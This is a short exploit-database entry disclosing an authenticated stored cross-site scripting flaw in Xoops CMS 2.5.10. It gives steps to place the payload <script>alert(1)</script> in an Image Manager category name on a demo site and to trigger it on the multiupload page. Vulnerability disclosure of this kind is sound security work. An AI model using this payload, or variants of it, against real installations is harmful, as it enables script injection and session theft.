Exploits / Vulnerability Discovered : 2023-06-14 |
Type : webapps |
Platform : php
This exploit / vulnerability Xoops cms 2.5.10 stored crosssite scripting (xss) (authenticated) is for educational purposes only and if it is used you will do on your own risk!
1) Login admin panel and click Image Manager , choose Add Category :
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images
2) Write your payload in the Category Name field and submit:
Payload: <script>alert(1)</script>
3) After click multiupload , when you move the mouse to the payload name, you will see the alert button
https://demos5.softaculous.com/Xoopshkqdowiwqq/modules/system/admin.php?fct=images&op=multiupload&imgcat_id=2